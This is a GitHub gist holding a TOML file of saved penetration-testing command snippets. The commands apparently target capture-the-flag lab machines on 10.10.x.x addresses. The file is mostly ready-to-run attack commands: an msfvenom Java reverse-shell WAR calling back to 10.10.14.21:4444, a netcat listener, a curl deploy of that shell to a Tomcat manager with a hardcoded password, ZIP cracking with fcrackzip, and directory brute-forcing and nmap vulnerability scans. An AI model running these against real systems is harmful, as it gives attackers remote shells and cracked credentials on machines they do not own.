Skip to content

Instantly share code, notes, and snippets.

@offlinehacker
Last active September 2, 2020 14:05
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save offlinehacker/e055018945ba012176a82960c80249a4 to your computer and use it in GitHub Desktop.
Save offlinehacker/e055018945ba012176a82960c80249a4 to your computer and use it in GitHub Desktop.
description
[[snippets]]
description = "create java reverse shell"
command = "msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f war > shell.war"
tag = ["reverse", "shell", "java", "metasploit", "msfvenom"]
output = ""
[[snippets]]
description = "listen for reverse shell"
command = "nc -tnlvp 4444"
tag = ["reverse", "shell", "netcat"]
output = ""
[[snippets]]
description = "crack zip password"
command = "fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' archive.zip"
tag = ["crack", "zip", "password"]
output = ""
[[snippets]]
description = "Apache tomcat deploy reverse shell"
command = "curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/myhackshell"
tag = ["apache", "tomcat", "reverse", "shell"]
output = ""
[[snippets]]
description = "hash-identifier faca404fd5c0a31cf1897b823c695c85cffeb98d"
command = "identify hash"
tag = ["hash", "identify", "crypto"]
output = ""
[[snippets]]
description = "Fuzz search for files using dirsearch"
command = "python3 dirsearch.py -u http://10.10.10.191 -e *"
tag = ["fuzz", "search", "web", "enumerate", "files"]
output = ""
[[snippets]]
description = "Fuzz search for files using gobuster"
command = "gobuster dir -e -u http://10.10.10.191/ -x txt,sql,tar.gz -w /usr/share/seclists/Discovery/Web-Content/common.txt"
tag = ["fuzz", "search", "web", "files", "enumerate"]
output = ""
[[snippets]]
description = "Generate password wordlist using content from website"
command = "cewl -w wordlists.txt -d 10 -m 1 http://10.10.10.191"
tag = ["password", "wordlist", "generate", "password", "list"]
output = ""
[[snippets]]
description = "nmap scan"
command = "nmap -vvv -sS -sV -oN nmap.txt --script=default,vuln -p- -PN 10.10.10.191"
tag = ["nmap"]
output = ""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment